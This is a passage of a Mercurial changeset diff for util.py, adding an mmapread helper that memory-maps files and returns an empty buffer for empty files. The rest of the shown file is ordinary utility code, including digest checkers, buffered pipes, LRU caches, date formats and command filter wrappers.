util: add an mmapread method...
Mark Thomas
r34296:3bb2a9f2 default
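The new helper returns a read-only memory map of the whole file, falling back to an empty buffer for empty files (which cannot be mmapped). A minimal usage sketch of mmapread (the file name is a placeholder):

    with open('some-revlog.d', 'rb') as fp:
        data = mmapread(fp)   # buffer-like object backed by mmap
        header = data[:4]     # supports slicing like a byte string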
@@ -1,3769 +1,3781 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 import mmap
29 30 import os
30 31 import platform as pyplatform
31 32 import re as remod
32 33 import shutil
33 34 import signal
34 35 import socket
35 36 import stat
36 37 import string
37 38 import subprocess
38 39 import sys
39 40 import tempfile
40 41 import textwrap
41 42 import time
42 43 import traceback
43 44 import warnings
44 45 import zlib
45 46
46 47 from . import (
47 48 encoding,
48 49 error,
49 50 i18n,
50 51 policy,
51 52 pycompat,
52 53 )
53 54
54 55 base85 = policy.importmod(r'base85')
55 56 osutil = policy.importmod(r'osutil')
56 57 parsers = policy.importmod(r'parsers')
57 58
58 59 b85decode = base85.b85decode
59 60 b85encode = base85.b85encode
60 61
61 62 cookielib = pycompat.cookielib
62 63 empty = pycompat.empty
63 64 httplib = pycompat.httplib
64 65 httpserver = pycompat.httpserver
65 66 pickle = pycompat.pickle
66 67 queue = pycompat.queue
67 68 socketserver = pycompat.socketserver
68 69 stderr = pycompat.stderr
69 70 stdin = pycompat.stdin
70 71 stdout = pycompat.stdout
71 72 stringio = pycompat.stringio
72 73 urlerr = pycompat.urlerr
73 74 urlreq = pycompat.urlreq
74 75 xmlrpclib = pycompat.xmlrpclib
75 76
76 77 # workaround for win32mbcs
77 78 _filenamebytestr = pycompat.bytestr
78 79
79 80 def isatty(fp):
80 81 try:
81 82 return fp.isatty()
82 83 except AttributeError:
83 84 return False
84 85
85 86 # glibc determines buffering on first write to stdout - if we replace a
86 87 # TTY-destined stdout with a pipe-destined stdout (e.g. a pager), we want
87 88 # line buffering
88 89 if isatty(stdout):
89 90 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 91
91 92 if pycompat.osname == 'nt':
92 93 from . import windows as platform
93 94 stdout = platform.winstdout(stdout)
94 95 else:
95 96 from . import posix as platform
96 97
97 98 _ = i18n._
98 99
99 100 bindunixsocket = platform.bindunixsocket
100 101 cachestat = platform.cachestat
101 102 checkexec = platform.checkexec
102 103 checklink = platform.checklink
103 104 copymode = platform.copymode
104 105 executablepath = platform.executablepath
105 106 expandglobs = platform.expandglobs
106 107 explainexit = platform.explainexit
107 108 findexe = platform.findexe
108 109 gethgcmd = platform.gethgcmd
109 110 getuser = platform.getuser
110 111 getpid = os.getpid
111 112 groupmembers = platform.groupmembers
112 113 groupname = platform.groupname
113 114 hidewindow = platform.hidewindow
114 115 isexec = platform.isexec
115 116 isowner = platform.isowner
116 117 listdir = osutil.listdir
117 118 localpath = platform.localpath
118 119 lookupreg = platform.lookupreg
119 120 makedir = platform.makedir
120 121 nlinks = platform.nlinks
121 122 normpath = platform.normpath
122 123 normcase = platform.normcase
123 124 normcasespec = platform.normcasespec
124 125 normcasefallback = platform.normcasefallback
125 126 openhardlinks = platform.openhardlinks
126 127 oslink = platform.oslink
127 128 parsepatchoutput = platform.parsepatchoutput
128 129 pconvert = platform.pconvert
129 130 poll = platform.poll
130 131 popen = platform.popen
131 132 posixfile = platform.posixfile
132 133 quotecommand = platform.quotecommand
133 134 readpipe = platform.readpipe
134 135 rename = platform.rename
135 136 removedirs = platform.removedirs
136 137 samedevice = platform.samedevice
137 138 samefile = platform.samefile
138 139 samestat = platform.samestat
139 140 setbinary = platform.setbinary
140 141 setflags = platform.setflags
141 142 setsignalhandler = platform.setsignalhandler
142 143 shellquote = platform.shellquote
143 144 spawndetached = platform.spawndetached
144 145 split = platform.split
145 146 sshargs = platform.sshargs
146 147 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 148 statisexec = platform.statisexec
148 149 statislink = platform.statislink
149 150 testpid = platform.testpid
150 151 umask = platform.umask
151 152 unlink = platform.unlink
152 153 username = platform.username
153 154
154 155 try:
155 156 recvfds = osutil.recvfds
156 157 except AttributeError:
157 158 pass
158 159 try:
159 160 setprocname = osutil.setprocname
160 161 except AttributeError:
161 162 pass
162 163
163 164 # Python compatibility
164 165
165 166 _notset = object()
166 167
167 168 # disable Python's problematic floating point timestamps (issue4836)
168 169 # (Python hypocritically says you shouldn't change this behavior in
169 170 # libraries, and sure enough Mercurial is not a library.)
170 171 os.stat_float_times(False)
171 172
172 173 def safehasattr(thing, attr):
173 174 return getattr(thing, attr, _notset) is not _notset
174 175
175 176 def bytesinput(fin, fout, *args, **kwargs):
176 177 sin, sout = sys.stdin, sys.stdout
177 178 try:
178 179 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 180 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
180 181 finally:
181 182 sys.stdin, sys.stdout = sin, sout
182 183
183 184 def bitsfrom(container):
184 185 bits = 0
185 186 for bit in container:
186 187 bits |= bit
187 188 return bits
188 189
189 190 # Python 2.6 still has deprecation warnings enabled by default. We do not want
190 191 # to display anything to the standard user, so detect if we are running tests
191 192 # and only use Python deprecation warnings in that case.
192 193 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
193 194 if _dowarn:
194 195 # explicitly unfilter our warning for python 2.7
195 196 #
196 197 # The option of setting PYTHONWARNINGS in the test runner was investigated.
197 198 # However, a module name set through PYTHONWARNINGS is matched exactly, so
198 199 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
199 200 # makes the whole PYTHONWARNINGS approach useless for our use case.
200 201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
201 202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
202 203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
203 204
204 205 def nouideprecwarn(msg, version, stacklevel=1):
205 206 """Issue an python native deprecation warning
206 207
207 208 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
208 209 """
209 210 if _dowarn:
210 211 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
211 212 " update your code.)") % version
212 213 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
213 214
214 215 DIGESTS = {
215 216 'md5': hashlib.md5,
216 217 'sha1': hashlib.sha1,
217 218 'sha512': hashlib.sha512,
218 219 }
219 220 # List of digest types from strongest to weakest
220 221 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
221 222
222 223 for k in DIGESTS_BY_STRENGTH:
223 224 assert k in DIGESTS
224 225
225 226 class digester(object):
226 227 """helper to compute digests.
227 228
228 229 This helper can be used to compute one or more digests given their name.
229 230
230 231 >>> d = digester([b'md5', b'sha1'])
231 232 >>> d.update(b'foo')
232 233 >>> [k for k in sorted(d)]
233 234 ['md5', 'sha1']
234 235 >>> d[b'md5']
235 236 'acbd18db4cc2f85cedef654fccc4a4d8'
236 237 >>> d[b'sha1']
237 238 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
238 239 >>> digester.preferred([b'md5', b'sha1'])
239 240 'sha1'
240 241 """
241 242
242 243 def __init__(self, digests, s=''):
243 244 self._hashes = {}
244 245 for k in digests:
245 246 if k not in DIGESTS:
246 247 raise Abort(_('unknown digest type: %s') % k)
247 248 self._hashes[k] = DIGESTS[k]()
248 249 if s:
249 250 self.update(s)
250 251
251 252 def update(self, data):
252 253 for h in self._hashes.values():
253 254 h.update(data)
254 255
255 256 def __getitem__(self, key):
256 257 if key not in DIGESTS:
257 258 raise Abort(_('unknown digest type: %s') % key)
258 259 return self._hashes[key].hexdigest()
259 260
260 261 def __iter__(self):
261 262 return iter(self._hashes)
262 263
263 264 @staticmethod
264 265 def preferred(supported):
265 266 """returns the strongest digest type in both supported and DIGESTS."""
266 267
267 268 for k in DIGESTS_BY_STRENGTH:
268 269 if k in supported:
269 270 return k
270 271 return None
271 272
272 273 class digestchecker(object):
273 274 """file handle wrapper that additionally checks content against a given
274 275 size and digests.
275 276
276 277 d = digestchecker(fh, size, {'md5': '...'})
277 278
278 279 When multiple digests are given, all of them are validated.
279 280 """
280 281
281 282 def __init__(self, fh, size, digests):
282 283 self._fh = fh
283 284 self._size = size
284 285 self._got = 0
285 286 self._digests = dict(digests)
286 287 self._digester = digester(self._digests.keys())
287 288
288 289 def read(self, length=-1):
289 290 content = self._fh.read(length)
290 291 self._digester.update(content)
291 292 self._got += len(content)
292 293 return content
293 294
294 295 def validate(self):
295 296 if self._size != self._got:
296 297 raise Abort(_('size mismatch: expected %d, got %d') %
297 298 (self._size, self._got))
298 299 for k, v in self._digests.items():
299 300 if v != self._digester[k]:
300 301 # i18n: first parameter is a digest name
301 302 raise Abort(_('%s mismatch: expected %s, got %s') %
302 303 (k, v, self._digester[k]))
303 304
304 305 try:
305 306 buffer = buffer
306 307 except NameError:
307 308 def buffer(sliceable, offset=0, length=None):
308 309 if length is not None:
309 310 return memoryview(sliceable)[offset:offset + length]
310 311 return memoryview(sliceable)[offset:]
311 312
312 313 closefds = pycompat.osname == 'posix'
313 314
314 315 _chunksize = 4096
315 316
316 317 class bufferedinputpipe(object):
317 318 """a manually buffered input pipe
318 319
319 320 Python will not let us use buffered IO and lazy reading with 'polling' at
320 321 the same time. We cannot probe the buffer state and select will not detect
321 322 that data are ready to read if they are already buffered.
322 323
323 324 This class lets us work around that by implementing its own buffering
324 325 (allowing efficient readline) while offering a way to know if the buffer
325 326 is empty from the outside (allowing the buffer to collaborate with polling).
326 327
327 328 This class lives in the 'util' module because it makes use of the 'os'
328 329 module from the python stdlib.
329 330 """
330 331
331 332 def __init__(self, input):
332 333 self._input = input
333 334 self._buffer = []
334 335 self._eof = False
335 336 self._lenbuf = 0
336 337
337 338 @property
338 339 def hasbuffer(self):
339 340 """True is any data is currently buffered
340 341
341 342 This will be used externally as a pre-step for polling IO. If there is
342 343 already data then no polling should be set in place."""
343 344 return bool(self._buffer)
344 345
345 346 @property
346 347 def closed(self):
347 348 return self._input.closed
348 349
349 350 def fileno(self):
350 351 return self._input.fileno()
351 352
352 353 def close(self):
353 354 return self._input.close()
354 355
355 356 def read(self, size):
356 357 while (not self._eof) and (self._lenbuf < size):
357 358 self._fillbuffer()
358 359 return self._frombuffer(size)
359 360
360 361 def readline(self, *args, **kwargs):
361 362 if 1 < len(self._buffer):
362 363 # this should not happen because both read and readline end with a
363 364 # _frombuffer call that collapses it.
364 365 self._buffer = [''.join(self._buffer)]
365 366 self._lenbuf = len(self._buffer[0])
366 367 lfi = -1
367 368 if self._buffer:
368 369 lfi = self._buffer[-1].find('\n')
369 370 while (not self._eof) and lfi < 0:
370 371 self._fillbuffer()
371 372 if self._buffer:
372 373 lfi = self._buffer[-1].find('\n')
373 374 size = lfi + 1
374 375 if lfi < 0: # end of file
375 376 size = self._lenbuf
376 377 elif 1 < len(self._buffer):
377 378 # we need to take previous chunks into account
378 379 size += self._lenbuf - len(self._buffer[-1])
379 380 return self._frombuffer(size)
380 381
381 382 def _frombuffer(self, size):
382 383 """return at most 'size' data from the buffer
383 384
384 385 The data are removed from the buffer."""
385 386 if size == 0 or not self._buffer:
386 387 return ''
387 388 buf = self._buffer[0]
388 389 if 1 < len(self._buffer):
389 390 buf = ''.join(self._buffer)
390 391
391 392 data = buf[:size]
392 393 buf = buf[len(data):]
393 394 if buf:
394 395 self._buffer = [buf]
395 396 self._lenbuf = len(buf)
396 397 else:
397 398 self._buffer = []
398 399 self._lenbuf = 0
399 400 return data
400 401
401 402 def _fillbuffer(self):
402 403 """read data to the buffer"""
403 404 data = os.read(self._input.fileno(), _chunksize)
404 405 if not data:
405 406 self._eof = True
406 407 else:
407 408 self._lenbuf += len(data)
408 409 self._buffer.append(data)
409 410
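# Illustrative sketch of how bufferedinputpipe cooperates with polling
# (the subprocess and the poll call are placeholders):
#
#   proc = subprocess.Popen(['cat'], stdin=subprocess.PIPE,
#                           stdout=subprocess.PIPE)
#   pipe = bufferedinputpipe(proc.stdout)
#   if not pipe.hasbuffer:
#       poll([pipe.fileno()])   # only block in poll() when nothing is
#                               # already sitting in the buffer
#   line = pipe.readline()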
411 def mmapread(fp):
412 try:
413 fd = getattr(fp, 'fileno', lambda: fp)()
414 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 except ValueError:
416 # Empty files cannot be mmapped, but mmapread should still work. Check
417 # if the file is empty, and if so, return an empty buffer.
418 if os.fstat(fd).st_size == 0:
419 return ''
420 raise
421
410 422 def popen2(cmd, env=None, newlines=False):
411 423 # Setting bufsize to -1 lets the system decide the buffer size.
412 424 # The default for bufsize is 0, meaning unbuffered. This leads to
413 425 # poor performance on Mac OS X: http://bugs.python.org/issue4194
414 426 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
415 427 close_fds=closefds,
416 428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
417 429 universal_newlines=newlines,
418 430 env=env)
419 431 return p.stdin, p.stdout
420 432
421 433 def popen3(cmd, env=None, newlines=False):
422 434 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
423 435 return stdin, stdout, stderr
424 436
425 437 def popen4(cmd, env=None, newlines=False, bufsize=-1):
426 438 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
427 439 close_fds=closefds,
428 440 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
429 441 stderr=subprocess.PIPE,
430 442 universal_newlines=newlines,
431 443 env=env)
432 444 return p.stdin, p.stdout, p.stderr, p
433 445
434 446 def version():
435 447 """Return version information if available."""
436 448 try:
437 449 from . import __version__
438 450 return __version__.version
439 451 except ImportError:
440 452 return 'unknown'
441 453
442 454 def versiontuple(v=None, n=4):
443 455 """Parses a Mercurial version string into an N-tuple.
444 456
445 457 The version string to be parsed is specified with the ``v`` argument.
446 458 If it isn't defined, the current Mercurial version string will be parsed.
447 459
448 460 ``n`` can be 2, 3, or 4. Here is how some version strings map to
449 461 returned values:
450 462
451 463 >>> v = b'3.6.1+190-df9b73d2d444'
452 464 >>> versiontuple(v, 2)
453 465 (3, 6)
454 466 >>> versiontuple(v, 3)
455 467 (3, 6, 1)
456 468 >>> versiontuple(v, 4)
457 469 (3, 6, 1, '190-df9b73d2d444')
458 470
459 471 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
460 472 (3, 6, 1, '190-df9b73d2d444+20151118')
461 473
462 474 >>> v = b'3.6'
463 475 >>> versiontuple(v, 2)
464 476 (3, 6)
465 477 >>> versiontuple(v, 3)
466 478 (3, 6, None)
467 479 >>> versiontuple(v, 4)
468 480 (3, 6, None, None)
469 481
470 482 >>> v = b'3.9-rc'
471 483 >>> versiontuple(v, 2)
472 484 (3, 9)
473 485 >>> versiontuple(v, 3)
474 486 (3, 9, None)
475 487 >>> versiontuple(v, 4)
476 488 (3, 9, None, 'rc')
477 489
478 490 >>> v = b'3.9-rc+2-02a8fea4289b'
479 491 >>> versiontuple(v, 2)
480 492 (3, 9)
481 493 >>> versiontuple(v, 3)
482 494 (3, 9, None)
483 495 >>> versiontuple(v, 4)
484 496 (3, 9, None, 'rc+2-02a8fea4289b')
485 497 """
486 498 if not v:
487 499 v = version()
488 500 parts = remod.split('[\+-]', v, 1)
489 501 if len(parts) == 1:
490 502 vparts, extra = parts[0], None
491 503 else:
492 504 vparts, extra = parts
493 505
494 506 vints = []
495 507 for i in vparts.split('.'):
496 508 try:
497 509 vints.append(int(i))
498 510 except ValueError:
499 511 break
500 512 # (3, 6) -> (3, 6, None)
501 513 while len(vints) < 3:
502 514 vints.append(None)
503 515
504 516 if n == 2:
505 517 return (vints[0], vints[1])
506 518 if n == 3:
507 519 return (vints[0], vints[1], vints[2])
508 520 if n == 4:
509 521 return (vints[0], vints[1], vints[2], extra)
510 522
511 523 # used by parsedate
512 524 defaultdateformats = (
513 525 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
514 526 '%Y-%m-%dT%H:%M', # without seconds
515 527 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
516 528 '%Y-%m-%dT%H%M', # without seconds
517 529 '%Y-%m-%d %H:%M:%S', # our common legal variant
518 530 '%Y-%m-%d %H:%M', # without seconds
519 531 '%Y-%m-%d %H%M%S', # without :
520 532 '%Y-%m-%d %H%M', # without seconds
521 533 '%Y-%m-%d %I:%M:%S%p',
522 534 '%Y-%m-%d %H:%M',
523 535 '%Y-%m-%d %I:%M%p',
524 536 '%Y-%m-%d',
525 537 '%m-%d',
526 538 '%m/%d',
527 539 '%m/%d/%y',
528 540 '%m/%d/%Y',
529 541 '%a %b %d %H:%M:%S %Y',
530 542 '%a %b %d %I:%M:%S%p %Y',
531 543 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
532 544 '%b %d %H:%M:%S %Y',
533 545 '%b %d %I:%M:%S%p %Y',
534 546 '%b %d %H:%M:%S',
535 547 '%b %d %I:%M:%S%p',
536 548 '%b %d %H:%M',
537 549 '%b %d %I:%M%p',
538 550 '%b %d %Y',
539 551 '%b %d',
540 552 '%H:%M:%S',
541 553 '%I:%M:%S%p',
542 554 '%H:%M',
543 555 '%I:%M%p',
544 556 )
545 557
546 558 extendeddateformats = defaultdateformats + (
547 559 "%Y",
548 560 "%Y-%m",
549 561 "%b",
550 562 "%b %Y",
551 563 )
552 564
553 565 def cachefunc(func):
554 566 '''cache the result of function calls'''
555 567 # XXX doesn't handle keyword args
556 568 if func.__code__.co_argcount == 0:
557 569 cache = []
558 570 def f():
559 571 if len(cache) == 0:
560 572 cache.append(func())
561 573 return cache[0]
562 574 return f
563 575 cache = {}
564 576 if func.__code__.co_argcount == 1:
565 577 # we gain a small amount of time because
566 578 # we don't need to pack/unpack the list
567 579 def f(arg):
568 580 if arg not in cache:
569 581 cache[arg] = func(arg)
570 582 return cache[arg]
571 583 else:
572 584 def f(*args):
573 585 if args not in cache:
574 586 cache[args] = func(*args)
575 587 return cache[args]
576 588
577 589 return f
578 590
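# Illustrative sketch of cachefunc (the function body is a placeholder):
#
#   @cachefunc
#   def square(x):
#       return x * x
#
#   square(3)   # computed and stored
#   square(3)   # served from the cache; square() is not called again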
579 591 class sortdict(collections.OrderedDict):
580 592 '''a simple sorted dictionary
581 593
582 594 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
583 595 >>> d2 = d1.copy()
584 596 >>> d2
585 597 sortdict([('a', 0), ('b', 1)])
586 598 >>> d2.update([(b'a', 2)])
587 599 >>> list(d2.keys()) # should still be in last-set order
588 600 ['b', 'a']
589 601 '''
590 602
591 603 def __setitem__(self, key, value):
592 604 if key in self:
593 605 del self[key]
594 606 super(sortdict, self).__setitem__(key, value)
595 607
596 608 if pycompat.ispypy:
597 609 # __setitem__() isn't called as of PyPy 5.8.0
598 610 def update(self, src):
599 611 if isinstance(src, dict):
600 612 src = src.iteritems()
601 613 for k, v in src:
602 614 self[k] = v
603 615
604 616 class transactional(object):
605 617 """Base class for making a transactional type into a context manager."""
606 618 __metaclass__ = abc.ABCMeta
607 619
608 620 @abc.abstractmethod
609 621 def close(self):
610 622 """Successfully closes the transaction."""
611 623
612 624 @abc.abstractmethod
613 625 def release(self):
614 626 """Marks the end of the transaction.
615 627
616 628 If the transaction has not been closed, it will be aborted.
617 629 """
618 630
619 631 def __enter__(self):
620 632 return self
621 633
622 634 def __exit__(self, exc_type, exc_val, exc_tb):
623 635 try:
624 636 if exc_type is None:
625 637 self.close()
626 638 finally:
627 639 self.release()
628 640
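# Illustrative sketch of a minimal transactional subclass (all names are
# placeholders):
#
#   class mytxn(transactional):
#       def close(self):
#           pass    # commit the changes
#       def release(self):
#           pass    # roll back unless close() was called
#
#   with mytxn() as txn:
#       pass        # on success close() runs, then release(); on an
#                   # exception only release() runs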
629 641 @contextlib.contextmanager
630 642 def acceptintervention(tr=None):
631 643 """A context manager that closes the transaction on InterventionRequired
632 644
633 645 If no transaction was provided, this simply runs the body and returns
634 646 """
635 647 if not tr:
636 648 yield
637 649 return
638 650 try:
639 651 yield
640 652 tr.close()
641 653 except error.InterventionRequired:
642 654 tr.close()
643 655 raise
644 656 finally:
645 657 tr.release()
646 658
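# Illustrative sketch of acceptintervention (tr is a placeholder
# transaction object):
#
#   with acceptintervention(tr):
#       dostuff()   # if InterventionRequired is raised, tr is closed
#                   # before the exception propagates; tr.release() runs
#                   # in all cases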
647 659 @contextlib.contextmanager
648 660 def nullcontextmanager():
649 661 yield
650 662
651 663 class _lrucachenode(object):
652 664 """A node in a doubly linked list.
653 665
654 666 Holds a reference to nodes on either side as well as a key-value
655 667 pair for the dictionary entry.
656 668 """
657 669 __slots__ = (u'next', u'prev', u'key', u'value')
658 670
659 671 def __init__(self):
660 672 self.next = None
661 673 self.prev = None
662 674
663 675 self.key = _notset
664 676 self.value = None
665 677
666 678 def markempty(self):
667 679 """Mark the node as emptied."""
668 680 self.key = _notset
669 681
670 682 class lrucachedict(object):
671 683 """Dict that caches most recent accesses and sets.
672 684
673 685 The dict consists of an actual backing dict - indexed by original
674 686 key - and a doubly linked circular list defining the order of entries in
675 687 the cache.
676 688
677 689 The head node is the newest entry in the cache. If the cache is full,
678 690 we recycle head.prev and make it the new head. Cache accesses result in
679 691 the node being moved to before the existing head and being marked as the
680 692 new head node.
681 693 """
682 694 def __init__(self, max):
683 695 self._cache = {}
684 696
685 697 self._head = head = _lrucachenode()
686 698 head.prev = head
687 699 head.next = head
688 700 self._size = 1
689 701 self._capacity = max
690 702
691 703 def __len__(self):
692 704 return len(self._cache)
693 705
694 706 def __contains__(self, k):
695 707 return k in self._cache
696 708
697 709 def __iter__(self):
698 710 # We don't have to iterate in cache order, but why not.
699 711 n = self._head
700 712 for i in range(len(self._cache)):
701 713 yield n.key
702 714 n = n.next
703 715
704 716 def __getitem__(self, k):
705 717 node = self._cache[k]
706 718 self._movetohead(node)
707 719 return node.value
708 720
709 721 def __setitem__(self, k, v):
710 722 node = self._cache.get(k)
711 723 # Replace existing value and mark as newest.
712 724 if node is not None:
713 725 node.value = v
714 726 self._movetohead(node)
715 727 return
716 728
717 729 if self._size < self._capacity:
718 730 node = self._addcapacity()
719 731 else:
720 732 # Grab the last/oldest item.
721 733 node = self._head.prev
722 734
723 735 # At capacity. Kill the old entry.
724 736 if node.key is not _notset:
725 737 del self._cache[node.key]
726 738
727 739 node.key = k
728 740 node.value = v
729 741 self._cache[k] = node
730 742 # And mark it as newest entry. No need to adjust order since it
731 743 # is already self._head.prev.
732 744 self._head = node
733 745
734 746 def __delitem__(self, k):
735 747 node = self._cache.pop(k)
736 748 node.markempty()
737 749
738 750 # Temporarily mark as newest item before re-adjusting head to make
739 751 # this node the oldest item.
740 752 self._movetohead(node)
741 753 self._head = node.next
742 754
743 755 # Additional dict methods.
744 756
745 757 def get(self, k, default=None):
746 758 try:
747 759 return self._cache[k].value
748 760 except KeyError:
749 761 return default
750 762
751 763 def clear(self):
752 764 n = self._head
753 765 while n.key is not _notset:
754 766 n.markempty()
755 767 n = n.next
756 768
757 769 self._cache.clear()
758 770
759 771 def copy(self):
760 772 result = lrucachedict(self._capacity)
761 773 n = self._head.prev
762 774 # Iterate in oldest-to-newest order, so the copy has the right ordering
763 775 for i in range(len(self._cache)):
764 776 result[n.key] = n.value
765 777 n = n.prev
766 778 return result
767 779
768 780 def _movetohead(self, node):
769 781 """Mark a node as the newest, making it the new head.
770 782
771 783 When a node is accessed, it becomes the freshest entry in the LRU
772 784 list, which is denoted by self._head.
773 785
774 786 Visually, let's make ``N`` the new head node (* denotes head):
775 787
776 788 previous/oldest <-> head <-> next/next newest
777 789
778 790 ----<->--- A* ---<->-----
779 791 | |
780 792 E <-> D <-> N <-> C <-> B
781 793
782 794 To:
783 795
784 796 ----<->--- N* ---<->-----
785 797 | |
786 798 E <-> D <-> C <-> B <-> A
787 799
788 800 This requires the following moves:
789 801
790 802 C.next = D (node.prev.next = node.next)
791 803 D.prev = C (node.next.prev = node.prev)
792 804 E.next = N (head.prev.next = node)
793 805 N.prev = E (node.prev = head.prev)
794 806 N.next = A (node.next = head)
795 807 A.prev = N (head.prev = node)
796 808 """
797 809 head = self._head
798 810 # C.next = D
799 811 node.prev.next = node.next
800 812 # D.prev = C
801 813 node.next.prev = node.prev
802 814 # N.prev = E
803 815 node.prev = head.prev
804 816 # N.next = A
805 817 # It is tempting to do just "head" here; however, if node is
806 818 # adjacent to head, this will do bad things.
807 819 node.next = head.prev.next
808 820 # E.next = N
809 821 node.next.prev = node
810 822 # A.prev = N
811 823 node.prev.next = node
812 824
813 825 self._head = node
814 826
815 827 def _addcapacity(self):
816 828 """Add a node to the circular linked list.
817 829
818 830 The new node is inserted before the head node.
819 831 """
820 832 head = self._head
821 833 node = _lrucachenode()
822 834 head.prev.next = node
823 835 node.prev = head.prev
824 836 node.next = head
825 837 head.prev = node
826 838 self._size += 1
827 839 return node
828 840
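# Illustrative sketch of lrucachedict eviction:
#
#   d = lrucachedict(2)
#   d['a'] = 1
#   d['b'] = 2
#   d['a']          # access refreshes 'a'
#   d['c'] = 3      # evicts 'b', the least recently used entry
#   'b' in d        # -> False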
829 841 def lrucachefunc(func):
830 842 '''cache most recent results of function calls'''
831 843 cache = {}
832 844 order = collections.deque()
833 845 if func.__code__.co_argcount == 1:
834 846 def f(arg):
835 847 if arg not in cache:
836 848 if len(cache) > 20:
837 849 del cache[order.popleft()]
838 850 cache[arg] = func(arg)
839 851 else:
840 852 order.remove(arg)
841 853 order.append(arg)
842 854 return cache[arg]
843 855 else:
844 856 def f(*args):
845 857 if args not in cache:
846 858 if len(cache) > 20:
847 859 del cache[order.popleft()]
848 860 cache[args] = func(*args)
849 861 else:
850 862 order.remove(args)
851 863 order.append(args)
852 864 return cache[args]
853 865
854 866 return f
855 867
856 868 class propertycache(object):
857 869 def __init__(self, func):
858 870 self.func = func
859 871 self.name = func.__name__
860 872 def __get__(self, obj, type=None):
861 873 result = self.func(obj)
862 874 self.cachevalue(obj, result)
863 875 return result
864 876
865 877 def cachevalue(self, obj, value):
866 878 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
867 879 obj.__dict__[self.name] = value
868 880
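# Illustrative sketch of propertycache (the class and helper are
# placeholders):
#
#   class thing(object):
#       @propertycache
#       def expensive(self):
#           return computevalue()   # runs once; the result is stored in
#                                   # the instance __dict__ and shadows
#                                   # this descriptor afterwards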
869 881 def pipefilter(s, cmd):
870 882 '''filter string S through command CMD, returning its output'''
871 883 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
872 884 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
873 885 pout, perr = p.communicate(s)
874 886 return pout
875 887
876 888 def tempfilter(s, cmd):
877 889 '''filter string S through a pair of temporary files with CMD.
878 890 CMD is used as a template to create the real command to be run,
879 891 with the strings INFILE and OUTFILE replaced by the real names of
880 892 the temporary files generated.'''
881 893 inname, outname = None, None
882 894 try:
883 895 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
884 896 fp = os.fdopen(infd, pycompat.sysstr('wb'))
885 897 fp.write(s)
886 898 fp.close()
887 899 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
888 900 os.close(outfd)
889 901 cmd = cmd.replace('INFILE', inname)
890 902 cmd = cmd.replace('OUTFILE', outname)
891 903 code = os.system(cmd)
892 904 if pycompat.sysplatform == 'OpenVMS' and code & 1:
893 905 code = 0
894 906 if code:
895 907 raise Abort(_("command '%s' failed: %s") %
896 908 (cmd, explainexit(code)))
897 909 return readfile(outname)
898 910 finally:
899 911 try:
900 912 if inname:
901 913 os.unlink(inname)
902 914 except OSError:
903 915 pass
904 916 try:
905 917 if outname:
906 918 os.unlink(outname)
907 919 except OSError:
908 920 pass
909 921
910 922 filtertable = {
911 923 'tempfile:': tempfilter,
912 924 'pipe:': pipefilter,
913 925 }
914 926
915 927 def filter(s, cmd):
916 928 "filter a string through a command that transforms its input to its output"
917 929 for name, fn in filtertable.iteritems():
918 930 if cmd.startswith(name):
919 931 return fn(s, cmd[len(name):].lstrip())
920 932 return pipefilter(s, cmd)
921 933
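# Illustrative sketch of the two filter styles (the commands are examples):
#
#   filter('some text', 'pipe: tr a-z A-Z')
#   filter('some text', 'tempfile: sort INFILE > OUTFILE')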
922 934 def binary(s):
923 935 """return true if a string is binary data"""
924 936 return bool(s and '\0' in s)
925 937
926 938 def increasingchunks(source, min=1024, max=65536):
927 939 '''return no less than min bytes per chunk while data remains,
928 940 doubling min after each chunk until it reaches max'''
929 941 def log2(x):
930 942 if not x:
931 943 return 0
932 944 i = 0
933 945 while x:
934 946 x >>= 1
935 947 i += 1
936 948 return i - 1
937 949
938 950 buf = []
939 951 blen = 0
940 952 for chunk in source:
941 953 buf.append(chunk)
942 954 blen += len(chunk)
943 955 if blen >= min:
944 956 if min < max:
945 957 min = min << 1
946 958 nmin = 1 << log2(blen)
947 959 if nmin > min:
948 960 min = nmin
949 961 if min > max:
950 962 min = max
951 963 yield ''.join(buf)
952 964 blen = 0
953 965 buf = []
954 966 if buf:
955 967 yield ''.join(buf)
956 968
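# Illustrative sketch of increasingchunks:
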